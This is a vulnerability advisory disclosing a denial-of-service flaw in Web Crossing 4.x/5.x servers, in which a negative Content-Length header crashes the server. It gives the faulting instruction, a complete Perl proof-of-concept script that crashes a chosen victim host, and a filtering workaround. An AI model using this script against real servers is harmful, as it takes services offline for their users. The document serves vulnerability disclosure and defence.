Web Crossing 4.x/5.x Denial of Service Vulnerability

###################################################

Credit:
Author     : Peter Winter-Smith

Software:
Package    : Web Crossing
Versions   : 4.x/5.x
Vendor     : WebCrossing, Inc.
Vendor Url : http://www.webcrossing.com/

Vulnerability:
Bug Type   : Denial of Service
Severity   : Less Critical


1. Description of Software

"Web Crossing is the world's leading collaboration server platform,
offering complete solutions including discussion groups/bulletin boards,
integrated newsgroups and mailing lists, full email services, calendar
services, real-time chats, live events and full web application
programming features, complete cross-platform compatibility, and
distributed/mirrored serving for ultimate scaleability."
- Vendors Description


2. Bug Information

(a). Denial of Service

When an HTTP POST request is made to Web Crossing's built-in server
application (default port 80/tcp), if the 'Content-Length' header supplied
with the request is an extremely large or negative number, the server
will encounter a set of instructions which lead to an integer-divide-by-
zero problem, immediately crashing the server and denying any further
service.

The offending instruction is located at 0090121F:


0090121F   F7F9             IDIV ECX



3. Proof of Concept

The following perl script should crash any Web Crossing BBS using the
built-in server application for hosting:


#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
#  [ Bad 'Content-Length' Header Bug ]
#
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
{
print "Usage: wxdos.pl <victim>\n";
exit;
}

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
      "\t[ Bad 'Content-Length' Header Bug ]\n" .
      "\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                             PeerPort=>"80")
                            or die "Unable to connect to $ARGV[0] on " .
                             "port 80";


$DoS    = "POST / HTTP/1.1\r\n" .
          "Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################


4. Patches - Workarounds

Although I was able to contact the Web Crossing support staff, when the
investigation into this flaw was handed over to the development team all
contact was lost with both them and the support staff and my emails were
no-longer answered. I have decided to release this information so that
users of Web Crossing can decide what would be a suitable course of action
for protecting their systems from this bug.

No vendor supplied patches exist, I would recommend that filtering of the
'Content-Length' header is put into action via some third party
application if at all possible.


5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at
                   http://www.elitehaven.net/webxdos.txt

_________________________________________________________________
Sign-up for a FREE BT Broadband connection today! 
http://www.msn.co.uk/specials/btbroadband